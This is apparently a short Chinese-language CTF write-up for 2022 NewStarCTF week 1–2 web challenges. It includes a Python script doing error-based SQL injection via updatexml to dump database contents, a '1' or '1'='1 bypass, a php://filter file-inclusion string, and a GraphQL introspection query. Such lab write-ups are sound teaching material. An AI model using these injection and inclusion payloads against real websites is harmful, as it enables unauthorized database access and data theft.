WEEK1-WEEK2

HTTP

GET/POST/Cookie

Head?Header!

User-Agent Referer

我真的会谢

.index.php.swp

www.zip

robots.txt

Word-For-You

1' or '1'='1

NotPHP

伪协议弱比较命令执行

Word-For-You 2

提示调试代码，尝试报错注入

import requests

url = 'http://39d8595b-85c2-4178-8a92-7968924a9dd5.node4.buuoj.cn:81/comments.php'

# payload = f'-- select group_concat(schema_name) from information_schema.schemata'
# payload = 'select group_concat(table_name) from information_schema.tables where table_schema="wfy"'
#~wfy_admin,wfy_comments,wfy_information'
# payload = 'select group_concat(column_name) from information_schema.columns where table_schema=\'wfy\' and table_name=\'wfy_comments\''
# ~id,text,user,name,display
payload = 'select (group_concat(0x7e,text)) from wfy.wfy_comments'
# ~flag{Ju4t_m2ke_some_err0rs}

data = {
    # 'name': f'\'or/**/updatexml(1,concat(0x7e,({payload})),1)/**/or/**/\''
    # 'name': f'\'or/**/updatexml(1,right(concat(0x7e,({payload})),16),1)/**/or/**/\''
    'name': f'\'or/**/updatexml(1,right(concat(0x7e,({payload})),32),1)/**/or/**/\''
}

response = requests.post(url=url, data=data)
print(response.text)

UnserializeOne

入门的反序列化

IncludeOne

PHP伪随机数以伪协议利用

php://filter/read=string.rot13|NewStar|/resource=flag.php

ezAPI

没玩过

查询

{"query":"\n query IntrospectionQuery {\r\n __schema {\r\n
queryType { name }\r\n mutationType { name }\r\n subscriptionType {
name }\r\n types {\r\n ...FullType\r\n }\r\n
directives {\r\n name\r\n description\r\n
locations\r\n args {\r\n ...InputValue\r\n }\r\n
}\r\n }\r\n }\r\n\r\n fragment FullType on __Type {\r\n
kind\r\n name\r\n description\r\n fields(includeDeprecated: true)
{\r\n name\r\n description\r\n args {\r\n
...InputValue\r\n }\r\n type {\r\n ...TypeRef\r\n
}\r\n isDeprecated\r\n deprecationReason\r\n }\r\n
inputFields {\r\n ...InputValue\r\n }\r\n interfaces {\r\n
...TypeRef\r\n }\r\n enumValues(includeDeprecated: true) {\r\n
name\r\n description\r\n isDeprecated\r\n
deprecationReason\r\n }\r\n possibleTypes {\r\n ...TypeRef\r\n
}\r\n }\r\n\r\n fragment InputValue on __InputValue {\r\n name\r\n
description\r\n type { ...TypeRef }\r\n defaultValue\r\n
}\r\n\r\n fragment TypeRef on __Type {\r\n kind\r\n name\r\n
ofType {\r\n kind\r\n name\r\n ofType {\r\n
kind\r\n name\r\n ofType {\r\n kind\r\n
name\r\n ofType {\r\n kind\r\n name\r\n
ofType {\r\n kind\r\n name\r\n
ofType {\r\n kind\r\n name\r\n
ofType {\r\n kind\r\n name\r\n
}\r\n }\r\n }\r\n }\r\n
}\r\n }\r\n }\r\n }\r\n ","variables":null}

flag

payload:id=1&data={"query":"query{\nffffllllaaagggg_1n_h3r3_flag {\nflag\n}\n}\n"}

Previous2022 NewStarCTF Next[WEEK3]Maybe You Have To think More

Last updated 3 years ago